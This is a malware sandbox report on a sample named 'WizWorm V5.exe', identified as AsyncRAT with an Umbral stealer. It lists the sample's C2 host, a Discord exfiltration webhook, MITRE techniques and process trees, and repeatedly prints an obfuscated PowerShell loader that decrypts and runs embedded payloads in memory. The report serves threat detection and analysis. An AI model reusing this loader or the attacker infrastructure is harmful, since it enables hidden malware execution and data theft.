asyncrat | fc2c1679e7d3b6abb01b8c38dec3f16d56d173940a06181244330aa0bc30ab4c

Analysis

max time kernel
10s
max time network
151s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
25-07-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WizWorm V5/WizWorm V5.exe
Size

21.3MB
MD5

c831f8de57e6bc935d531d95999b7364
SHA1

a85f7c7946e458cf1ba64a233b3932cc314c9cad
SHA256

e1559165017c04cebc3d56bbb9cc7f5b7b18e520f2eec6f77484496e204a92ca
SHA512

1429f4700398b62d70dd51233d95b79aebc0e5a04aa31fea7304cee7b3f7723cd4f8d451945b088615f0f3f77777dfc3e4b8615ce51c42c247a9f392fe46749d
SSDEEP

393216:uSrV5LLmx9KZlGlDAzkG7N2mZ8GeVnBmdRqBXsXG6kik5l1aGEWvPBqeh3:B5R5zkG7/OGe6dReXN6CuGpv

Score

10^/10

asyncrat umbral default discovery execution rat stealer

Malware Config

Extracted

Family

asyncrat

Version

WeedRAT

Botnet

Default

true-baghdad.gl.at.ply.gg:61202

Mutex

xInKFBCkbzDz

Attributes

delay
3
install
true
install_file
wzcdetect.exe
install_folder
%AppData%

aes.plain

Extracted

Family

umbral

https://discord.com/api/webhooks/1249878996729200650/D6Sae4N0q4Tdhi6fxln2bXNVm1jQNdpHYtnipXyc04dBJs5Jp2LSJWfIMCi0Hs66R2-7

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/memory/1680-58-0x0000000001230000-0x0000000001270000-memory.dmp	family_umbral
behavioral1/files/0x00060000000194b1-57.dat	family_umbral
behavioral1/memory/664-361-0x000007FEEDCC0000-0x000007FEEE65D000-memory.dmp	family_umbral
behavioral1/memory/1688-549-0x0000000001290000-0x00000000012D0000-memory.dmp	family_umbral
behavioral1/memory/3020-743-0x00000000012B0000-0x00000000012F0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0007000000004e74-54.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
532	powershell.exe
956	powershell.exe
2908	powershell.exe
2936	powershell.exe
2544	powershell.exe
2148	powershell.exe
2608	powershell.exe
2088	powershell.exe
2928	powershell.exe
1548	powershell.exe
2028	powershell.exe
1760	powershell.exe
1708	powershell.exe
2836	powershell.exe
2088	powershell.exe
264	powershell.exe
2332	powershell.exe
2740	powershell.exe
1548	powershell.exe
2276	powershell.exe
1056	powershell.exe
1388	powershell.exe
2156	powershell.exe
1636	powershell.exe
3000	powershell.exe
788	powershell.exe
612	powershell.exe
1620	powershell.exe
2140	powershell.exe
1224	powershell.exe
1660	powershell.exe
1308	powershell.exe
1488	powershell.exe
1804	powershell.exe
2728	powershell.exe
1804	powershell.exe
1324	powershell.exe
2236	powershell.exe
776	powershell.exe
2752	powershell.exe
2472	powershell.exe
2552	powershell.exe
1396	powershell.exe
2412	powershell.exe
2088	powershell.exe
1560	powershell.exe
2608	powershell.exe
1616	powershell.exe
1932	powershell.exe
2092	powershell.exe
2456	powershell.exe
2576	powershell.exe
2544	powershell.exe
2692	powershell.exe
2124	powershell.exe
444	powershell.exe
572	powershell.exe
1964	powershell.exe
2816	powershell.exe
532	powershell.exe
1268	powershell.exe
1964	powershell.exe
664	powershell.exe
2620	powershell.exe

Executes dropped EXE 9 IoCs

pid	Process
2908	WizWormV4.exe
2696	WizWormV4.exe
2644	RoboterXRAT V5.exe
2692	WizWormV4.exe
2784	RoboterXRAT V5.exe
1656	RoboterXRAT V5.exe
1736	WeedClient.exe
1680	sihost.exe
1312	WizWormV4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

flow	ioc
72	discord.com
10	discord.com
32	discord.com
33	discord.com
48	discord.com
49	discord.com
58	discord.com
9	discord.com
26	discord.com
42	discord.com
57	discord.com
80	discord.com
81	discord.com
16	discord.com
17	discord.com
64	discord.com
65	discord.com
87	discord.com
25	discord.com
41	discord.com
71	discord.com
88	discord.com

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
29	ip-api.com
45	ip-api.com
52	ip-api.com
75	ip-api.com
84	ip-api.com
13	ip-api.com
20	ip-api.com
36	ip-api.com
61	ip-api.com
68	ip-api.com
91	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
264	cmd.exe
2124	cmd.exe
1220	PING.EXE
988	cmd.exe
2068	cmd.exe
1056	PING.EXE
1656	cmd.exe
1432	PING.EXE
920	cmd.exe
1988	PING.EXE
764	cmd.exe
932	PING.EXE
2764	cmd.exe
2256	PING.EXE
1500	cmd.exe
676	cmd.exe
236	PING.EXE
1528	PING.EXE
2812	PING.EXE
3016	PING.EXE
1684	PING.EXE
1964	cmd.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2760	timeout.exe
1816	timeout.exe

Detects videocard installed 1 TTPs 11 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
628	wmic.exe
1632	wmic.exe
812	wmic.exe
2852	wmic.exe
1528	wmic.exe
2932	wmic.exe
1860	wmic.exe
3064	wmic.exe
572	wmic.exe
1852	wmic.exe
3000	wmic.exe

Runs net.exe

Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery

T1018

pid	Process
932	PING.EXE
1056	PING.EXE
3016	PING.EXE
1528	PING.EXE
2812	PING.EXE
1988	PING.EXE
1684	PING.EXE
1220	PING.EXE
2256	PING.EXE
1432	PING.EXE
236	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2820	schtasks.exe
2428	schtasks.exe
1908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
636	powershell.exe
1268	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	1680	sihost.exe
Token: SeIncreaseQuotaPrivilege	2424	wmic.exe
Token: SeSecurityPrivilege	2424	wmic.exe
Token: SeTakeOwnershipPrivilege	2424	wmic.exe
Token: SeLoadDriverPrivilege	2424	wmic.exe
Token: SeSystemProfilePrivilege	2424	wmic.exe
Token: SeSystemtimePrivilege	2424	wmic.exe
Token: SeProfSingleProcessPrivilege	2424	wmic.exe
Token: SeIncBasePriorityPrivilege	2424	wmic.exe
Token: SeCreatePagefilePrivilege	2424	wmic.exe
Token: SeBackupPrivilege	2424	wmic.exe
Token: SeRestorePrivilege	2424	wmic.exe
Token: SeShutdownPrivilege	2424	wmic.exe
Token: SeDebugPrivilege	2424	wmic.exe
Token: SeSystemEnvironmentPrivilege	2424	wmic.exe
Token: SeRemoteShutdownPrivilege	2424	wmic.exe
Token: SeUndockPrivilege	2424	wmic.exe
Token: SeManageVolumePrivilege	2424	wmic.exe
Token: 33	2424	wmic.exe
Token: 34	2424	wmic.exe
Token: 35	2424	wmic.exe
Token: SeIncreaseQuotaPrivilege	2424	wmic.exe
Token: SeSecurityPrivilege	2424	wmic.exe
Token: SeTakeOwnershipPrivilege	2424	wmic.exe
Token: SeLoadDriverPrivilege	2424	wmic.exe
Token: SeSystemProfilePrivilege	2424	wmic.exe
Token: SeSystemtimePrivilege	2424	wmic.exe
Token: SeProfSingleProcessPrivilege	2424	wmic.exe
Token: SeIncBasePriorityPrivilege	2424	wmic.exe
Token: SeCreatePagefilePrivilege	2424	wmic.exe
Token: SeBackupPrivilege	2424	wmic.exe
Token: SeRestorePrivilege	2424	wmic.exe
Token: SeShutdownPrivilege	2424	wmic.exe
Token: SeDebugPrivilege	2424	wmic.exe
Token: SeSystemEnvironmentPrivilege	2424	wmic.exe
Token: SeRemoteShutdownPrivilege	2424	wmic.exe
Token: SeUndockPrivilege	2424	wmic.exe
Token: SeManageVolumePrivilege	2424	wmic.exe
Token: 33	2424	wmic.exe
Token: 34	2424	wmic.exe
Token: 35	2424	wmic.exe
Token: SeDebugPrivilege	1268	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 2700 wrote to memory of 2908	2700	WizWorm V5.exe	30
PID 2700 wrote to memory of 2908	2700	WizWorm V5.exe	30
PID 2700 wrote to memory of 2908	2700	WizWorm V5.exe	30
PID 2908 wrote to memory of 2696	2908	WizWormV4.exe	31
PID 2908 wrote to memory of 2696	2908	WizWormV4.exe	31
PID 2908 wrote to memory of 2696	2908	WizWormV4.exe	31
PID 2908 wrote to memory of 2596	2908	WizWormV4.exe	32
PID 2908 wrote to memory of 2596	2908	WizWormV4.exe	32
PID 2908 wrote to memory of 2596	2908	WizWormV4.exe	32
PID 2908 wrote to memory of 2644	2908	WizWormV4.exe	34
PID 2908 wrote to memory of 2644	2908	WizWormV4.exe	34
PID 2908 wrote to memory of 2644	2908	WizWormV4.exe	34
PID 2596 wrote to memory of 2416	2596	cmd.exe	35
PID 2596 wrote to memory of 2416	2596	cmd.exe	35
PID 2596 wrote to memory of 2416	2596	cmd.exe	35
PID 2416 wrote to memory of 264	2416	net.exe	36
PID 2416 wrote to memory of 264	2416	net.exe	36
PID 2416 wrote to memory of 264	2416	net.exe	36
PID 2596 wrote to memory of 636	2596	cmd.exe	525
PID 2596 wrote to memory of 636	2596	cmd.exe	525
PID 2596 wrote to memory of 636	2596	cmd.exe	525
PID 2696 wrote to memory of 2692	2696	WizWormV4.exe	908
PID 2696 wrote to memory of 2692	2696	WizWormV4.exe	908
PID 2696 wrote to memory of 2692	2696	WizWormV4.exe	908
PID 2696 wrote to memory of 2000	2696	WizWormV4.exe	853
PID 2696 wrote to memory of 2000	2696	WizWormV4.exe	853
PID 2696 wrote to memory of 2000	2696	WizWormV4.exe	853
PID 2644 wrote to memory of 2784	2644	RoboterXRAT V5.exe	898
PID 2644 wrote to memory of 2784	2644	RoboterXRAT V5.exe	898
PID 2644 wrote to memory of 2784	2644	RoboterXRAT V5.exe	898
PID 2000 wrote to memory of 2008	2000	cmd.exe	42
PID 2000 wrote to memory of 2008	2000	cmd.exe	42
PID 2000 wrote to memory of 2008	2000	cmd.exe	42
PID 2644 wrote to memory of 1736	2644	RoboterXRAT V5.exe	43
PID 2644 wrote to memory of 1736	2644	RoboterXRAT V5.exe	43
PID 2644 wrote to memory of 1736	2644	RoboterXRAT V5.exe	43
PID 2644 wrote to memory of 1736	2644	RoboterXRAT V5.exe	43
PID 2008 wrote to memory of 2820	2008	net.exe	832
PID 2008 wrote to memory of 2820	2008	net.exe	832
PID 2008 wrote to memory of 2820	2008	net.exe	832
PID 2644 wrote to memory of 1680	2644	RoboterXRAT V5.exe	45
PID 2644 wrote to memory of 1680	2644	RoboterXRAT V5.exe	45
PID 2644 wrote to memory of 1680	2644	RoboterXRAT V5.exe	45
PID 2696 wrote to memory of 1656	2696	WizWormV4.exe	294
PID 2696 wrote to memory of 1656	2696	WizWormV4.exe	294
PID 2696 wrote to memory of 1656	2696	WizWormV4.exe	294
PID 1680 wrote to memory of 2424	1680	sihost.exe	718
PID 1680 wrote to memory of 2424	1680	sihost.exe	718
PID 1680 wrote to memory of 2424	1680	sihost.exe	718
PID 2000 wrote to memory of 1268	2000	cmd.exe	1038
PID 2000 wrote to memory of 1268	2000	cmd.exe	1038
PID 2000 wrote to memory of 1268	2000	cmd.exe	1038
PID 2692 wrote to memory of 1312	2692	WizWormV4.exe	614
PID 2692 wrote to memory of 1312	2692	WizWormV4.exe	614
PID 2692 wrote to memory of 1312	2692	WizWormV4.exe	614
PID 1656 wrote to memory of 1108	1656	RoboterXRAT V5.exe	604
PID 1656 wrote to memory of 1108	1656	RoboterXRAT V5.exe	604
PID 1656 wrote to memory of 1108	1656	RoboterXRAT V5.exe	604

Views/modifies file attributes 1 TTPs 12 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1788	attrib.exe
2768	attrib.exe
544	attrib.exe
2152	attrib.exe
2664	attrib.exe
812	attrib.exe
1624	attrib.exe
3068	attrib.exe
2160	attrib.exe
1912	attrib.exe
1096	attrib.exe
2216	attrib.exe

C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe
"C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2700
- C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
  "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
    "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
      "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2692
    - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        5⤵
        Executes dropped EXE
        
        PID:1312
      - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        6⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        7⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        8⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        9⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        10⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        11⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        12⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        13⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        14⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        15⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        16⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        17⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        18⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        19⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        20⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        21⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        22⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        23⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        24⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        25⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        26⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        27⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        28⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        29⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        30⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        31⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        32⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        33⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        34⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        35⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        36⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        37⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        38⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        39⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        40⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        41⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        42⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        43⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        44⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        45⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        46⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        47⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        48⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        49⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        50⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        51⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        52⤵
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        53⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        54⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        55⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        56⤵
        
        PID:2072
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        56⤵
        
        PID:2360
        
        C:\Windows\system32\net.exe
        
        net file
        57⤵
        
        PID:236
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        58⤵
        
        PID:2580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        57⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        56⤵
        
        PID:1608
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        55⤵
        
        PID:2060
        
        C:\Windows\system32\net.exe
        
        net file
        56⤵
        
        PID:2496
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        57⤵
        
        PID:2576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        56⤵
        
        PID:896
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:1552
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        54⤵
        
        PID:928
        
        C:\Windows\system32\net.exe
        
        net file
        55⤵
        
        PID:1388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        56⤵
        
        PID:2964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ 